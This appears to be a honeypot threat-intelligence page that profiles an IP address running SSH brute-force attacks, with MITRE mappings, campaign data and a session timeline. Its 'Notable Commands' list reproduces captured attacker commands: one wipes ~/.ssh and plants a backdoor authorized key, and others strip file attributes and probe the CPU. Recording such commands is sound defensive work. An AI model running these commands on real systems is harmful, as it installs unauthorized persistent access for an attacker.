IntrusionLabs IntrusionLabs
← Back to feed

106.13.96.57

Threat Confidence
57%
Location
🇨🇳 CN
ASN
AS38365 · Beijing Baidu Netcom Science and Technology Co., Ltd.
Cloud Provider
Total Events
113
Above average by volume
Agent Count
1
First / Last Seen
2026-04-30 20:09 — 2026-05-05 18:28
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
T1595 T1595.002
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Discovery
T1046 T1082
Command and Control
T1105
External Corroboration
Blocklist.de
Reported 2026-05-05 19:01
blocklist_de:reported
Campaigns
HASSH af8223ac9914… — SSH-2.0-libssh_0.12.0 (550 IPs, 75 countries) HASSH Active high 🇭🇰 HK
550 IPs 264693 events
ssh:bruteforce
2026-02-28 — ongoing · 550 IPs are running an identical SSH client (HASSH fingerprint af8223ac9914…). Top network: UCLOUD INFORMATION TECHNOLOGY HK LIMITED …
AS38365 Beijing Baidu Netcom Science and Technology Co., Ltd. ASN Active medium 🇨🇳 CN
38 IPs 2371 events
ssh:bruteforce
2026-02-18 — ongoing · 38 IPs from the same network (Beijing Baidu Netcom Science and Technology Co., Ltd., AS38365) were active during …
Session Forensics
scanner ×21 malware_dropper ×3 credential_probe ×2
Sessions
26 (3 with login)
Avg Depth Score
0.25
Commands Executed
10
Files Downloaded
3
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
  • cat /proc/cpuinfo | grep name | wc -l
Fingerprints
HASSH
af8223ac9914f509afdadfaf5f7ee94e
SSH Client
SSH-2.0-libssh_0.12.0
Evidence Timeline
Scanner 2362b68c5df1 w4m_singapore_01 · 2026-05-05 18:28
15%
Loading events...
Scanner def6d9ba8bd7 w4m_singapore_01 · 2026-05-05 18:27
15%
Loading events...
Scanner 7fa07be53e5f w4m_singapore_01 · 2026-05-05 18:25
15%
Loading events...
Scanner aad20d547eae w4m_singapore_01 · 2026-05-05 18:24
15%
Loading events...
Scanner c36f3df2f5d2 w4m_singapore_01 · 2026-05-05 18:19
15%
Loading events...
Malware Dropper 6e40912d88d8 w4m_singapore_01 · 2026-05-05 18:19
4 1 1 100%
Loading events...
Scanner 5eb837f856e8 w4m_singapore_01 · 2026-05-05 18:19
15%
Loading events...
Scanner bb39d6303212 w4m_singapore_01 · 2026-05-05 18:18
15%
Loading events...
Scanner b5ac572b184d w4m_singapore_01 · 2026-05-05 18:16
15%
Loading events...
Scanner df4c7dd623c8 w4m_singapore_01 · 2026-05-05 18:15
15%
Loading events...
Scanner ec36ec0582f3 w4m_singapore_01 · 2026-05-05 18:11
15%
Loading events...
Malware Dropper 1903d075ead0 w4m_singapore_01 · 2026-05-05 18:10
3 1 1 100%
Loading events...
Scanner f579a1aa632d w4m_singapore_01 · 2026-05-05 18:09
15%
Loading events...
Scanner 682761e606f4 w4m_singapore_01 · 2026-05-05 18:05
15%
Loading events...
Scanner 425271448523 w4m_singapore_01 · 2026-05-05 18:06
15%
Loading events...
Scanner f48ce59dbab6 w4m_singapore_01 · 2026-05-05 18:00
15%
Loading events...
Credential Probe de6ea7d7d052 w4m_singapore_01 · 2026-05-05 18:02
1 20%
Loading events...
Scanner 6c83be2332ef w4m_singapore_01 · 2026-05-05 17:58
15%
Loading events...
Scanner 9f0ba5faad3a w4m_singapore_01 · 2026-05-05 17:54
15%
Loading events...
Scanner 4f7fab2832c9 w4m_singapore_01 · 2026-05-05 17:50
15%
Loading events...
Scanner 7c325f40f098 w4m_singapore_01 · 2026-05-05 17:49
15%
Loading events...
Malware Dropper b450258441de w4m_singapore_01 · 2026-05-05 17:49
3 1 1 100%
Loading events...
Scanner 48db7e127990 w4m_singapore_01 · 2026-05-05 17:46
15%
Loading events...
Scanner f5644f87b794 w4m_singapore_01 · 2026-05-05 17:47
15%
Loading events...
Credential Probe 3d34dcc303ef w4m_singapore_01 · 2026-05-05 17:34
1 20%
Loading events...
Scanner d3da7c7503b3 w4m_singapore_01 · 2026-04-30 20:09
15%
Loading events...